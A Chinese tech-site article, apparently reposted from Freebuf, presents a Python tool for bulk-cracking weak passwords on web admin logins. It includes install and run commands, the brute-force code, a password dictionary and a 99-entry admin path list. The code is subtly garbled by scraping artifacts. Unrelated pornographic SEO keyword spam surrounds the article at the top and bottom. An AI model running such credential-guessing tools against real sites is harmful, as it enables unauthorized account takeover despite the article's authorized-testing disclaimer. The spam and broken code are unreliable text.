精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Web弱口令通用檢測方法探究

安全 數據安全
目前的各種web口令破解工具大多是針對某個cms進行設計,或者類似burpsuite需要手工配置,沒有見過能通用的破解工具,因此就有了這個小工具——通用web弱口令破解腳本。

注意:本腳本只是探討通用web口令破解的可行性,所有測試請自行搭建靶機環境或者在拿到目標系統相關授權后再進行測試。文中所涉及的技術、思路和工具僅供以安全為目的的學習交流使用,任何人不得將其用于非法用途以及盈利等目的,否則后果自行承擔!

[[262591]]

工具介紹

通用的web弱口令破解腳本,旨在批量檢測那些沒有驗證碼的管理后臺。

隨著攻防演練和一些漏洞挖掘任務的增多,有時候需要大批量快速的檢測一些網站后臺安全性,特別是測試一些管理弱口令,這種難度不大但比較費時費力的工作就需要一個自動化的腳本來完成了。但目前的各種web口令破解工具大多是針對某個cms進行設計,或者類似burpsuite需要手工配置,沒有見過能通用的破解工具。

因此就有了這個小工具——通用web弱口令破解腳本,配合另一個信息搜集工具

https://github.com/TideSec/FuzzScanner 可以進行批量快速刷分。

安裝使用

安裝使用都比較簡單:

從Github上拖下來

  1. git clone https://github.com/TideSec/web_pwd_common_crack 

安裝requirements.txt依賴

  1. pip install -r requirements.txt 

運行腳本即可

  1. python web_pwd_crack.py url.txt 50   --> url.txt為待掃描URL地址列表,50為線程數,默認為50 

url.txt為待檢測URL地址,可以自己寫個腳本批量從搜索引擎獲取,也可以自己用目錄枚舉工具去搜集。

功能原理

1. 訪問目標地址,分析關鍵字

原理非常low,就是從頁面中提取表單,對表單中的內容進行檢索,發現存在用戶名、密碼、username、pwd、pass之類的字段則認為是登錄頁面,然后提取參數組成data數據,發送給crack函數進行破解。

由于現在各種網站的請求包的多樣性,目前沒法做到像wvs那樣能提取到所有的登錄post,只是根據簡單的關鍵字進行了提取。

  1. logins =['用戶名','密碼','login','denglu','登錄','user','pass','yonghu','mima','pwd','zhanghao','yonghu','name','email','account'] 

在測試中還發現有時候搜索框會干擾結果,所以把搜索框又進行了排除

  1. sous = ['檢索','搜','search','查找','keyword','關鍵字'] 

另外,目前不支持自動識別驗證碼,所以對驗證碼也進行了排除

  1. yzms = ['驗證碼','點擊更換','點擊刷新','checkcode','valicode','code','captcha'] 

2. 通過解析頁面獲取post地址及參數

  1. def get_post_get_page(content,url): 
  2.     form_action = str(content).split('\n')[0] 
  3.     # print form_action 
  4.     soup = BS(form_action, "lxml") 
  5.     url_path = '' 
  6.     for x in re.findall(".*?/",url): 
  7.         url_pathurl_path =  url_path+x 
  8.  
  9.     action_url = soup.form['action'] 
  10.     if str(action_url).startswith('http'): 
  11.         path = action_url 
  12.     else: 
  13.         path = url_path+soup.form['action'] 
  14.     method = soup.form['method'] 
  15.     return path,method 

3. 在獲取相關參數和path后調用破解函數web_crack進行密碼破解

  1. def web_crack(method,path,data): 
  2.     conn =  requests.session() 
  3.     res0 = conn.get(path, headers=requests_headers(), allow_redirects=False,timeout=10,proxies = requests_proxies()) 
  4.     error_length,cookie_error_flag,dynamic_req_len = get_error_length(conn,method,path,data) 
  5.     if dynamic_req_len: 
  6.         return False,False 
  7.  
  8.     num = 0 
  9.     success_flag = 0 
  10.     dic_all = len(USERNAME_DIC)*len(PASSWORD_DIC) 
  11.     for user_name in USERNAME_DIC: 
  12.         for pass_word in PASSWORD_DIC: 
  13.             datadata1 = data 
  14.             # print data1 
  15.             user_nameuser_name = user_name.strip() 
  16.             pass_wordpass_word = pass_word.strip() 
  17.             pass_word = str(pass_word.replace('{user}', user_name)) 
  18.             data2 = str(data1.replace('%7Buser_name%7D', user_name)) 
  19.             data2 = str(data2.replace('%7Bpass_word%7D', pass_word)) 
  20.  
  21.             numnum = num+1 
  22.  
  23.             res = conn.post(url = path,data = data2headers=requests_headers(), timeout=10,verify=False,allow_redirects=False,proxies = requests_proxies()) 
  24.             cur_length = len(res.content+str(res.headers)) 
  25.  
  26.             if cookie_error_flag:  # cookie_error_flag表示每個數據包中都有cookie 
  27.                 if cur_length!=error_length: 
  28.                     success_flag =1 
  29.                     return user_name,pass_word 
  30.             elif 'Set-Cookie' in res.headers and cur_length!=error_length: 
  31.                 success_flag =1 
  32.                 return user_name,pass_word 
  33.     if success_flag == 0: 
  34.         return False,False 

配置了一個比較簡單的字典

  1. USERNAME_DIC = ['admin','guest','test','ceshi','system'] 
  2. PASSWORD_DIC = ['123456','admin','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2018','{user}2017','{user}2016','{user}2015','{user}!','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','a123456','p@ssw0rd','a123456789','woaini1314','qwerasdf','123456a','123456789a','987654321','qwer!@#$','5201314520', 'q123456', '123456abc', '123123123', '123456.','0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX','12345','1234567','passw0rd','admin888'] 

4. 如何判斷破解成功

目前使用了幾種方式相互結合的方法來共同驗證。

  • 通過返回包里有沒有Set-Cookie;
  • 返回數據包的長度變化;
  • 使用requests.session()進行重驗證;
  • 返回頁面的內容匹配。
  • 優化準確度,加入了recheck函數

在測試時發現會出現誤報情況,所以對成功的賬戶密碼進行了重驗證。比如:

  • 有些系統在探測多次之后出現封ip之類的情況,這時候會干擾破解腳本的判斷;
  • 有些系統在開始的時候沒有驗證碼,但錯誤幾次后會出現驗證碼;
  • 有些系統的提示信息會出現隨機的變更,導致誤報。

工作界面

掃描過程如下

screenshot

掃描成功的結果會保持在web_crack_ok.txt文件中

screenshot

掃描中識別到驗證碼、phpmyadmin等所有的日志會保存在web_crack_log.txt文件中,后期可以根據log日志再進行逐一篩查。

screenshot

其他說明

其實在完成這個工具后,也開始明白為什么市面上沒有通用的破解器,因為成功率的確不高!我測試過10000個管理后臺,破解出來弱口令的大約110個,有沒有漏報不清楚但基本沒有誤報。

成功率不高主要原因有:

  • web頁面類型繁雜,很難準確獲取并提交正確參數;
  • 很多頁面都有驗證碼,目前這個小腳本還沒法自動識別驗證碼;
  • 為了平衡時間和效率,使用了比較簡單的用戶名和密碼字典,所以稍微復雜的密碼就破解不出來了。

我一般會使用dirsearch或之類的目錄枚舉工具,配置一個比較輕便的管理后臺目錄字典,對目標地址進行批量掃描管理后臺,然后再使用web_pwd_crack.py對這些后臺地址批量進行弱口令破解。

貢獻一個比較精簡的管理后臺字典(100條)

  1. admin/default/login.asp 
  2. admin/login.asp 
  3. admin/manage/login.asp 
  4. admin_login/login.asp 
  5. admincp/login.asp 
  6. administrator/login.asp 
  7. login.asp 
  8. manage/login.asp 
  9. manager/login.asp 
  10. member/login.asp 
  11. admin-login.php 
  12. admin/admin-login.php 
  13. admin/admin_login.php 
  14. admin/login.php 
  15. admin2/login.php 
  16. admin_area/login.php 
  17. admin_login.php 
  18. adminarea/login.php 
  19. admincontrol/login.php 
  20. administrator/login.php 
  21. administratorlogin.php 
  22. adminlogin.php 
  23. autologin.php 
  24. bb-admin/login.php 
  25. blog/wp-login.php 
  26. checklogin.php 
  27. login.php 
  28. modelsearch/login.php 
  29. moderator/login.php 
  30. nsw/admin/login.php 
  31. pages/admin/admin-login.php 
  32. panel-administracion/login.php 
  33. processlogin.php 
  34. rcjakar/admin/login.php 
  35. relogin.php 
  36. siteadmin/login.php 
  37. sqlbuddy/login.php 
  38. userlogin.php 
  39. usuarios/login.php 
  40. webadmin/login.php 
  41. wp-login.php 
  42. account/login.jsp 
  43. accounts/login.jsp 
  44. admin/login.jsp 
  45. auth/login.jsp 
  46. jsp/extension/login.jsp 
  47. login.jsp 
  48. member/login.jsp 
  49. members/login.jsp 
  50. portalAppAdmin/login.jsp 
  51. admin.jsp 
  52. netadmin.jsp 
  53. admin.php 
  54. admin.php3 
  55. admin/admin.php 
  56. admin_area/admin.php 
  57. adminarea/admin.php 
  58. authadmin.php 
  59. bb-admin/admin.php 
  60. checkadmin.php 
  61. cmsadmin.php 
  62. dbadmin.php 
  63. fileadmin.php 
  64. isadmin.php 
  65. linusadmin-phpinfo.php 
  66. memberadmin.php 
  67. moadmin.php 
  68. modelsearch/admin.php 
  69. moderator/admin.php 
  70. panel-administracion/admin.php 
  71. phpliteadmin.php 
  72. siteadmin.php 
  73. sysadmin.php 
  74. tmp/admin.php 
  75. ur-admin.php 
  76. user/admin.php 
  77. users/admin.php 
  78. webadmin.php 
  79. webadmin/admin.php 
  80. wp-content/plugins/akismet/admin.php 
  81. admin.asp 
  82. admin.aspx 
  83. admin/default/admin.asp 
  84. admin/manage/admin.asp 
  85. admin_login/admin.asp 
  86. administrator/admin.asp 
  87. article/admin/admin.asp 
  88. denglu/admin.asp 
  89. guanli/admin.asp 
  90. houtai/admin.asp 
  91. login/admin/admin.asp 
  92. manage/admin.asp 
  93. manager/admin.asp 
  94. member/admin.asp 
  95. admin/logon.jsp 
  96. admin/secure/logon.jsp 
  97. compass/logon.jsp 
  98. logon.jsp 
  99. logon/logon.jsp 

ToDo

  • 驗證碼識別
  • 減少誤報率
  • 優化編碼處理
  • 能不那么low

 

責任編輯:趙寧寧 來源: Freebuf
相關推薦

2014-06-06 10:01:31

2015-11-11 14:08:07

2020-12-25 08:12:40

Web安全網絡安全

2020-12-14 08:09:03

弱口令工具掃描

2024-09-06 07:27:52

2009-11-23 10:40:47

路由器口令

2013-04-23 14:20:52

Wireshark弱口令

2019-05-26 14:59:22

2013-12-15 18:15:57

弱口令烏云漏洞

2018-04-15 17:57:30

2020-12-28 09:42:25

弱密碼密碼加密

2019-03-07 16:05:59

webJettyTomcat

2020-11-19 08:00:00

Kubernetes工具開發

2024-04-30 11:06:52

2010-10-11 10:41:57

2009-10-21 16:34:03

Oracle用戶名重建索引

2015-09-21 09:26:15

2021-02-06 12:05:24

SQL Serve后門惡意程序

2022-01-26 10:09:25

安全漏洞掃描工具緩存投毒漏洞

2021-09-29 23:43:53

Go OpenLdap檢測工具
點贊
收藏

51CTO技術棧公眾號

国产精品国产三级国产普通话蜜臀| 亚洲国产高清一区| 欧美高清www午色夜在线视频| 蜜桃视频成人在线观看| 污污视频在线免费看| 日韩和的一区二区| 欧美黄色片免费观看| 中文字幕国产综合| 亚洲电影一区| 欧美综合久久久| 成人黄色大片网站| 日本在线免费看| 不卡一卡二卡三乱码免费网站| 国产成人一区二区三区电影| 校园春色 亚洲| 欧美精品羞羞答答| 亚洲黄色www| 日本高清一区二区视频| 唐人社导航福利精品| 一区二区激情视频| 亚洲午夜精品国产| 你懂的在线视频| 成人综合在线观看| 成人性生交大片免费看视频直播| 中文字幕在线播| 亚洲激情二区| 久久国产精品影视| 久久精品在线观看视频| 香蕉久久夜色精品国产更新时间| 91精品国产一区二区三区| 久久人妻精品白浆国产 | 亚洲一区二区三区久久久| 亚洲成人一区在线| 97视频在线观看播放| 国产精品国产亚洲精品看不卡15| www.欧美色| 国产精品夜夜夜| 久久人人爽人人| 免费毛片在线播放免费| 亚洲国产精品日韩专区av有中文| 亚洲性视频网站| 国产精品无码一区二区三区免费| 中文一区二区三区四区| 日韩午夜在线播放| 一二三级黄色片| 精品视频在线播放一区二区三区| 欧美日韩国产一级二级| 色多多视频在线播放| 91jq激情在线观看| 亚洲综合色区另类av| 国产日韩欧美大片| av片哪里在线观看| 一区二区三区毛片| 日韩国产成人无码av毛片| 26uuu亚洲电影在线观看| 亚洲欧美一区二区三区孕妇| 亚洲精品偷拍视频| 动漫一区在线| 亚洲综合偷拍欧美一区色| 久久手机在线视频| 538视频在线| 岛国av在线不卡| 国产xxxxx视频| 国产精品亚洲d| 7777精品伊人久久久大香线蕉经典版下载 | 中文字幕在线播放| 亚洲婷婷国产精品电影人久久| 一区二区三区四区视频在线| 麻豆视频在线观看免费网站| 洋洋av久久久久久久一区| 久久久国内精品| 午夜影院在线观看国产主播| 色视频一区二区| 欧美丝袜在线观看| 999久久久久久久久6666| 亚洲国产天堂久久综合网| 美女爆乳18禁www久久久久久| 第一会所亚洲原创| 久久久91精品国产| 97人人澡人人爽人人模亚洲| 日韩va欧美va亚洲va久久| 成人激情在线观看| 嫩草影院一区二区| 日本一区二区三级电影在线观看 | 国产精品无码电影| 国产一区二区三区不卡视频网站| 色阁综合伊人av| 国产一级免费av| 男男成人高潮片免费网站| 亚洲专区国产精品| 欧美日韩在线中文字幕| 日韩理论在线观看| 男人靠女人免费视频网站| 高清欧美日韩| 日韩av一区二区在线观看| 中文字幕黄色网址| 在线精品观看| 成人激情在线播放| 久久久久久久影视| 亚洲最大成人综合| 日韩av卡一卡二| 欧美三级电影在线| 久久在精品线影院精品国产| 欧美性猛交bbbbb精品| 激情综合色播激情啊| 久久免费看av| 先锋影音在线资源站91| 欧洲视频一区二区| 精品视频站长推荐| 欧美成人日本| 国产啪精品视频网站| 手机福利在线| 亚洲午夜私人影院| 日韩成人av免费| 国产亚洲欧美日韩在线观看一区二区 | 日韩精品免费综合视频在线播放| 91杏吧porn蝌蚪| 久久久久综合| 精品亚洲第一| 538在线视频| 日韩欧美成人激情| 日本女人性生活视频| 美女网站久久| 农村寡妇一区二区三区| 久久青青色综合| 91精选在线观看| 日韩精品电影一区二区三区| 亚洲一区国产一区| 精品91免费| av老司机免费在线| 欧美videos中文字幕| 在线观看亚洲网站| 久久国产精品99久久人人澡| 亚洲国产日韩综合一区| 成人午夜精品| 亚洲欧美精品中文字幕在线| 青青草成人av| 97久久超碰国产精品电影| 九九热只有这里有精品| 97se亚洲| 97国产精品久久| 人妻精品一区一区三区蜜桃91| 亚洲国产精品一区二区久久| 丰满人妻一区二区三区53视频| 99热精品久久| 亚洲在线观看视频网站| 欧美videosex性欧美黑吊| 日韩免费在线观看| 日本三级午夜理伦三级三| 成人网在线播放| 欧美视频在线免费播放| 日韩高清在线免费观看| 日本aⅴ大伊香蕉精品视频| 久久手机免费观看| 欧美色综合久久| 天堂av免费在线| 国产盗摄视频一区二区三区| 欧美中日韩在线| 亚洲性视频大全| 国产精品久久久| 成人在线播放| 精品国产百合女同互慰| 久久久久久久极品| 国产日韩成人精品| www.51色.com| 一区二区自拍| 日韩理论片在线观看| 国产原创一区| 欧美日韩xxx| 婷婷视频在线观看| 在线观看网站黄不卡| 你懂得在线观看| 丁香一区二区三区| 六月激情综合网| 99久久国产综合精品成人影院| 91精品免费| 深夜福利视频一区二区| 中文字幕亚洲欧美日韩高清| 国产www免费观看| 天天爽夜夜爽夜夜爽精品视频| 亚洲自拍偷拍图| 国产高清不卡二三区| 欧美日韩在线中文| 亚洲h色精品| 精品亚洲欧美日韩| 青青久久精品| 91精品国产91久久久久久吃药| 国产高清自拍视频在线观看| 日韩一区二区三区观看| 成人在线免费看视频| 中文字幕一区不卡| 波多野结衣先锋影音| 久久精品国产秦先生| 久久国产精品视频在线观看| 成人在线免费视频观看| 国产精品一区在线观看| 精品九九久久| 69国产精品成人在线播放| 蜜芽在线免费观看| 国产丝袜一区视频在线观看| 99精品国产99久久久久久97| 色婷婷久久久综合中文字幕 | 国产视频网址在线| 精品伦理精品一区| 国产精品高潮呻吟AV无码| 色综合天天做天天爱| 国产亚洲自拍av| 中文字幕一区二区不卡| 天天躁日日躁aaaxxⅹ| 成人精品国产福利| 岛国av免费在线| 久久精品人人做人人爽电影蜜月| 天堂8在线天堂资源bt| 久久电影院7| 日韩av电影免费在线| 日韩超碰人人爽人人做人人添| 亚洲一区二区三区视频| a∨色狠狠一区二区三区| 青青青国产精品一区二区| 欧美videosex性极品hd| 欧美成人精品三级在线观看| 69久久精品| 正在播放国产一区| 国产精品视频二区三区| 亚洲欧美日韩一区二区三区在线| 亚洲精品久久久狠狠狠爱| 91精品久久久久久久91蜜桃| 亚洲视频久久久| 日本高清不卡一区| 日本一区二区三区精品| 精品久久中文字幕| 在线免费观看毛片| 亚洲一区视频在线观看视频| 欧美黄片一区二区三区| 一区二区在线观看免费视频播放| 中日韩一级黄色片| 亚洲图片你懂的| 国产精品白丝喷水在线观看| 日韩毛片在线免费观看| 成人免费视频网站入口::| 亚洲品质自拍视频网站| 黄色片在线观看网站| 亚洲精品高清视频在线观看| 九九热最新地址| 亚洲精品中文字幕乱码三区| 国产黄色片在线免费观看| 尤物视频一区二区| 久久精品久久精品久久| 精品国产1区2区| 色av性av丰满av| 在线免费一区三区| 进去里视频在线观看| 欧美日韩国产高清一区| 99国产精品久久久久久久成人| 日韩午夜激情av| 人妻精品无码一区二区| 亚洲男女性事视频| 在线免费看a| 欧美日韩电影在线观看| av色在线观看| 日韩av观看网址| 成人影院在线免费观看| 亚洲最大福利视频网站| 国产精品中文字幕制服诱惑| 久久久神马电影| 久久密一区二区三区| 国产精品久久久久久久久电影网| 亚洲三级免费| 波多野结衣作品集| 国产麻豆精品久久一二三| 超碰caoprom| 久久久精品中文字幕麻豆发布| 91视频免费在观看| 亚洲中国最大av网站| 草久久免费视频| 欧美男人的天堂一二区| 人人妻人人玩人人澡人人爽| 亚洲视频在线观看免费| 成人影院在线观看| 日本久久久久久| 韩国一区二区三区视频| 久久天天狠狠| 香蕉国产精品| 777精品久无码人妻蜜桃| 麻豆91精品视频| fc2成人免费视频| 国产精品久久久久久久蜜臀| 精品无码一区二区三区电影桃花| 欧洲一区二区av| 免费观看毛片网站| 中文字幕亚洲一区在线观看| 超碰在线网站| 成人精品视频在线| 亚洲第一论坛sis| 精品免费久久久久久久| 天堂精品中文字幕在线| 亚洲欧美综合视频| 国产精品久久久久桃色tv| 欧美激情亚洲综合| 欧美一级理论性理论a| 国产女人在线视频| 国内外成人免费激情在线视频| 欧美在线一级| 日韩福利一区二区三区| 极品av少妇一区二区| 91看片破解版| 欧美激情一区三区| 欧美日韩精品区| 精品精品欲导航| 国产激情视频在线观看| 国产精品你懂得| 婷婷综合一区| 青青草成人免费在线视频| 国产精品亚洲视频| 国产色视频一区| 草草在线视频| 99re在线观看| 亚洲精品一二三区区别| 久久综合伊人77777麻豆最新章节| www.日韩av| 久久久久久久久久久97| 欧美剧情片在线观看| 国产高清免费在线播放| 奇米4444一区二区三区 | 久久精品欧美| 一区视频在线看| 性活交片大全免费看| 一区二区三区欧美久久| 国产三级自拍视频| 精品国产欧美一区二区三区成人| 丁香婷婷久久| 亚洲精品中文字幕在线| 青娱乐精品在线视频| 中文字幕被公侵犯的漂亮人妻| 色综合久久88色综合天天免费| 香蕉久久国产av一区二区| 国内精品久久久久影院优| 国产精品超碰| 国产精品999视频| 91在线视频免费91| 亚洲第一在线播放| 亚洲人成在线播放| av成人亚洲| 在线精品日韩| 狠狠久久亚洲欧美| 欧美日韩精品亚洲精品| 精品国产乱码久久久久久久久| sqte在线播放| 国外成人在线视频网站| 国产精品女主播一区二区三区| 男女黄床上色视频| 在线观看精品一区| 91精彩在线视频| 成人性生交大片免费看小说| 欧美日韩三级| 性色av蜜臀av浪潮av老女人 | 能在线观看的av| 久久精品视频一区二区| 最近中文字幕在线视频| 日韩在线观看高清| 秋霞一区二区| 18禁免费观看网站| 国产日韩欧美精品在线| 亚洲天堂2021av| 色综合久久88| 自拍自偷一区二区三区| 国产wwwxx| 一区二区欧美精品| 嫩草在线播放| 91免费国产网站| 亚洲另类黄色| 成年人在线免费看片| 91精品国产91热久久久做人人| 7777kkk亚洲综合欧美网站| 日本中文不卡| 国产91在线|亚洲| 亚洲另类在线观看| 久久精品国产一区| 美女视频亚洲色图| 天天综合网日韩| 亚洲国产aⅴ天堂久久| 国产综合在线观看| 2022国产精品| 石原莉奈在线亚洲二区| 日本中文字幕免费在线观看| 亚洲毛片一区二区| 国产亚洲久久| 欧美黑人又粗又大又爽免费| 亚洲欧洲综合另类| 国产毛片在线| 国产不卡一区二区三区在线观看| 日韩高清电影一区| 日本亚洲色大成网站www久久| 一本色道久久88精品综合| 中文字幕一区二区三区中文字幕| 成人在线免费播放视频| 亚洲宅男天堂在线观看无病毒| 成人全视频高清免费观看| 91视频婷婷| 蜜臂av日日欢夜夜爽一区|